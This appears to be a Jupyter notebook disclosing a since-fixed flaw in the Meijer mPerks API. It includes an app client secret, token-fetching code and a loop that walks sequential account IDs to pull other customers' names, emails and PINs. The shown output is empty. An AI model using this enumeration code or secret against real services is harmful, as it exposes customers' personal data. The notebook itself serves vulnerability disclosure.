# Meijer Security Disclosure

I discovered this security issue when working on a Python API for the Meijer APIs.

See ```00_MeijerAppInit``` and ```01_MeijerLogin``` for the full background into how I found this.

## Setup.

Code to get to the point of the security issue (Better documented in ```01_MeijerLogin```):

In [1]:
import os
import requests
import base64

# Generate the Authorization string from account_services_secret
account_services_secret="drAqas76Re7RekeBanaMaNEMah7paDE5"
AUTH=base64.encodebytes("mma:{}".format(account_services_secret).encode("UTF-8")).decode("UTF-8").strip()

request=dict()
request["url"] = "https://login.meijer.com/as/token.oauth2"
request["headers"] = {
    'Authorization': 'Basic {}'.format(AUTH),
    'Platform': 'Android',
    'Version': '5.10.0',
    'Build': '51000000',
    'User-Agent': 'okhttp/3.8.0'
}
request["params"] =  {
    'grant_type': 'client_credentials',
    'scope': 'openid',
    "username": os.environ["MEIJER_USER"],
    "password": os.environ["MEIJER_PASS"] 
}
r = requests.post(**request)
assert r.status_code==200

access_token=r.json()["access_token"]

def get_mperks(meijer_id):
    request=dict()
    request["url"] = "https://mservices.meijer.com/dgtlmma/accounts/getAccount?id={}".format(meijer_id)
    request["headers"] = {
        'Accept': 'application/vnd.meijer.account.account-v1.0+json',
        'Authorization': 'Bearer {}'.format(access_token),
        'Content-Type': 'application/json',
        'Platform': 'Android',
        'Version': '5.10.0',
        'Build': '51000000',
        'User-Agent': 'okhttp/3.8.0'
    }
    try:
        r = requests.get(**request)
        assert r.status_code==200
        return r.json()
    except:
        return dict()

# Issue [FIXED]

The backend doesn't actually validate/verify/authenticate the user beyond the headers. You can edit the ```id=``` in the URL to get the data for any mPerks user.

As demonstrated here:

In [2]:
accounts = list()
for meijer_id in range(13266000, 13266020):
    accounts.append(get_mperks(meijer_id))

In [4]:
accounts

[{},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {},
 {}]

At one time, this was all available to the public. If you use your mPerks PIN as your ATM PIN, change it.

In [3]:
for account in accounts:
    print("{firstName} {lastName} <{email}> {mPerksPin}".format(**account))

KeyError: 'firstName'